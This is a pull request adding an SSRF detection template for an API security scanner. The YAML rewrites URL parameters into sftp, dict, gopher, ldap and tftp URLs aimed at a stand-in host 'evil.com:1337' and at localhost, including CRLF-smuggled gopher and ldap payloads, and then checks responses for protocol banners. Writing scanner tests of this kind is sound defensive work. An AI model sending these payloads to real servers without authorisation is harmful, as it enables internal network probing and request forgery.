### PR TITLE
Test for fetching data using SFTP, DICT, GOPHER, LDAP, TFTP protocols via SSRF

### DIFF
--- a/Server-Side-Request-Forgery/SSRFOnProtocolVulnerability.yaml
+++ b/Server-Side-Request-Forgery/SSRFOnProtocolVulnerability.yaml
@@ -136,3 +136,27 @@ validate:
   response_code:
     gte: 200
     lt: 300
+  response_payload:
+    contains_either:
+      # SFTP
+      - "SSH-.*"
+      - "OpenSSH.*"
+      # DICT
+      - "220.* DICT"
+      # GOPHER
+      - ".*Gopher server.*"
+      # LDAP
+      - "220.* LDAP.*"
+      # TFTP
+      - "TFTP server.*"
+      # Errors
+      - "Unable to establish .*"
+      - "Unable to connect .*"
+      - "Unable to access .*"
+
+  response_headers:
+    for_one:
+      key:
+        eq: Content-Type
+      value:
+        eq: application/octet-stream

--- a/Server-Side-Request-Forgery/SSRFOnProtocolVulnerability.yaml
+++ b/Server-Side-Request-Forgery/SSRFOnProtocolVulnerability.yaml
@@ -1,0 +1,65 @@
+id: SSRF_ON_PROTOCOL_VULNERABILITY
+info:
+  name: "SSRF Protocol Vulnerability Test"
+  description: "This test checks if the API is vulnerable to SSRF attacks using various protocols (SFTP, DICT, GOPHER, LDAP, TFTP)."
+  details: >
+    "This test aims to identify SSRF vulnerabilities in APIs by attempting to fetch information via different protocols (SFTP, DICT, GOPHER, LDAP, TFTP)." +
+    "If the API allows requests with these protocols and returns a response, it may be vulnerable to SSRF attacks."
+  impact: "Successful exploitation might lead to unauthorized access or information disclosure."
+  category:
+    name: SSRF
+    shortName: Server Side Request Forgery
+    displayName: Server Side Request Forgery (SSRF)
+  subCategory: SSRF_ON_PROTOCOL_VULNERABILITY
+  severity: HIGH
+  tags:
+    - Business logic
+    - OWASP top 10
+    - HackerOne top 10
+  references:
+    - https://github.com/akto-api-security/akto/issues/137
+    - https://medium.com/@madrobot/ssrf-server-side-request-forgery-types-and-ways-to-exploit-it-part-1-29d034c27978
+
+api_selection_filters:
+  response_code:
+    and:
+      gte: 200
+      lt: 205
+  or:
+    - request_payload:
+        for_one:
+          value:
+            contains_either:
+                - sftp://
+                - dict://
+                - gopher://
+                - ldap://
+                - tftp://
+          key:
+            extract: url_key
+    - query_param:
+        for_one:
+          value:
+            contains_either:
+                - sftp://
+                - dict://
+                - gopher://
+                - ldap://
+                - tftp://
+          key:
+            extract: url_key
+
+execute:
+  type: single
+  requests:
+    - req:
+      - modify_query_param:
+          url_key: http://example.com/ssrf.php?url=sftp://evil.com:1337/
+      - modify_body_param:
+          url_key: http://example.com/ssrf.php?url=sftp://evil.com:1337/
+validate:
+  response_code:
+    gte: 200
+    lt: 300
+  response_payload:
+    contains_either: "SSH"

--- a/Server-Side-Request-Forgery/SSRFOnProtocolVulnerability.yaml
+++ b/Server-Side-Request-Forgery/SSRFOnProtocolVulnerability.yaml
@@ -130,8 +130,6 @@ execute:
       - modify_body_param:
           tftp_key: tftp://evil.com:1337/TESTUDPPACKET
 
-
-
 validate:
   response_code:
     gte: 200
@@ -153,7 +151,6 @@ validate:
       - "Unable to establish .*"
       - "Unable to connect .*"
       - "Unable to access .*"
-
   response_headers:
     for_one:
       key:

--- a/Server-Side-Request-Forgery/SSRFOnProtocolVulnerability.yaml
+++ b/Server-Side-Request-Forgery/SSRFOnProtocolVulnerability.yaml
@@ -137,20 +137,21 @@ validate:
   response_payload:
     contains_either:
       # SFTP
-      - "SSH-.*"
-      - "OpenSSH.*"
+      - "SSH"
+      - "OpenSSH"
       # DICT
-      - "220.* DICT"
+      - "220"
+      - "DICT"
       # GOPHER
-      - ".*Gopher server.*"
+      - "Gopher server"
       # LDAP
-      - "220.* LDAP.*"
+      - "LDAP"
       # TFTP
-      - "TFTP server.*"
+      - "TFTP server"
       # Errors
-      - "Unable to establish .*"
-      - "Unable to connect .*"
-      - "Unable to access .*"
+      - "Unable to establish"
+      - "Unable to connect"
+      - "Unable to access"
   response_headers:
     for_one:
       key:

--- a/Server-Side-Request-Forgery/SSRFOnProtocolVulnerability.yaml
+++ b/Server-Side-Request-Forgery/SSRFOnProtocolVulnerability.yaml
@@ -31,35 +31,108 @@ api_selection_filters:
           value:
             contains_either:
                 - sftp://
-                - dict://
-                - gopher://
-                - ldap://
-                - tftp://
           key:
-            extract: url_key
+            extract: sftp_key
     - query_param:
         for_one:
           value:
             contains_either:
                 - sftp://
+          key:
+            extract: sftp_key
+
+    - request_payload:
+        for_one:
+          value:
+            contains_either:
                 - dict://
+          key:
+            extract: dict_key
+    - query_param:
+        for_one:
+          value:
+            contains_either:
+                - dict://
+          key:
+            extract: dict_key
+
+    - request_payload:
+        for_one:
+          value:
+            contains_either:
                 - gopher://
+          key:
+            extract: gopher_key
+    - query_param:
+        for_one:
+          value:
+            contains_either:
+                - gopher://
+          key:
+            extract: gopher_key
+
+    - request_payload:
+        for_one:
+          value:
+            contains_either:
                 - ldap://
+          key:
+            extract: ldap_key
+    - query_param:
+        for_one:
+          value:
+            contains_either:
+                - ldap://
+          key:
+            extract: ldap_key
+
+    - request_payload:
+        for_one:
+          value:
+            contains_either:
                 - tftp://
           key:
-            extract: url_key
+            extract: tftp_key
+    - query_param:
+        for_one:
+          value:
+            contains_either:
+                - tftp://
+          key:
+            extract: tftp_key
 
 execute:
   type: single
   requests:
     - req:
       - modify_query_param:
-          url_key: http://example.com/ssrf.php?url=sftp://evil.com:1337/
+          sftp_key: sftp://evil.com:1337/
       - modify_body_param:
-          url_key: http://example.com/ssrf.php?url=sftp://evil.com:1337/
+          sftp_key: sftp://evil.com:1337/
+          
+      - modify_query_param:
+          dict_key: dict://evil.com:1337/
+      - modify_body_param:
+          dict_key: dict://evil.com:1337/
+          
+      - modify_query_param:
+          gopher_key: gopher://evil.com:1337/_Hi%0Assrf%0Atest
+      - modify_body_param:
+          gopher_key: gopher://evil.com:1337/_Hi%0Assrf%0Atest
+          
+      - modify_query_param:
+          ldap_key: ldap://localhost:1337/%0astats%0aquit
+      - modify_body_param:
+          ldap_key: ldap://localhost:1337/%0astats%0aquit
+          
+      - modify_query_param:
+          tftp_key: tftp://evil.com:1337/TESTUDPPACKET
+      - modify_body_param:
+          tftp_key: tftp://evil.com:1337/TESTUDPPACKET
+
+
+
 validate:
   response_code:
     gte: 200
     lt: 300
-  response_payload:
-    contains_either: "SSH"


### PR DESCRIPTION
I am submitting a pull request for the SSRF Protocol Vulnerability Check test related to https://github.com/akto-api-security/akto/issues/137

This test is designed to identify vulnerabilities in APIs that accept URLs as parameters, specifically targeting protocols like SFTP, DICT, GOPHER, LDAP, and TFTP for potential SSRF.

Changes Made:
Added a new SSRF test targeting various protocols (SFTP, DICT, GOPHER, LDAP, TFTP).
Included specific modifications to the query parameter for each protocol.
Validated responses for expected content related to each protocol.
